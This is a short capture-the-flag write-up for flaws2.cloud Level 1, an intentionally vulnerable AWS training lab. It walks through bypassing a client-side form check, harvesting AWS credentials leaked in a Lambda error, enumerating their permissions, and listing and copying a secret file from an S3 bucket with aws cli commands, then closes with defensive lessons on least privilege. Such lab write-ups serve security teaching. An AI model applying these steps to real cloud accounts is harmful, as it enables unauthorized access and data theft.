flaws2.cloud (Level 1)
b) We can bypass this check just by modifying the HTML. We need to remove the “onsubmit” event listener from the form. OR you can directly intercept the valid form request in the burp suite.
c) Now if we try to pass characters that are not digits, we will get an error with debugging data including AWS Secrets.
d) Configuring the credentials in aws cli-
aws sts get-caller-identity --profile test
e) Enumerating permissions of our creds-
./bf-aws-permissions.sh -p test -r us-east-1
Tried all the allowed permissions but didn’t find anything interesting.
f) Checking the wapplyzer we came to know that this is indeed an s3 bucket.
aws --profile test s3 ls level1.flaws2.cloud
aws --profile test s3 cp s3://level1.flaws2.cloud/secret-ppxVFdwV4DDtZm8vbQRvhxL8mE6wxNco.html /tmp/html
Lesson learned (Source - challenge 2)
Whereas EC2 instances obtain the credentials for their IAM roles from the metadata service at 169.254.169.254 (as you learned in flaws.cloud Level 5), AWS Lambda obtains those credentials from environmental variables. Often developers will dump environmental variables when error conditions occur in order to help them debug problems. This is dangerous as sensitive information can sometimes be found in environmental variables.
Another problem is the IAM role had privileges to list the contents of a bucket that wasn’t needed for its operation. The best practice is to follow a Least Privilege strategy by giving services only the minimal privileges in their IAM policies that they need to accomplish their purpose. AWS CloudTrail logs can help identify past usage (leveraged by Duo Security’s CloudTracker) or AWS Access Advisor (leveraged by Netflix’s RepoKid).
Thanks for reading!! Please give your feedback.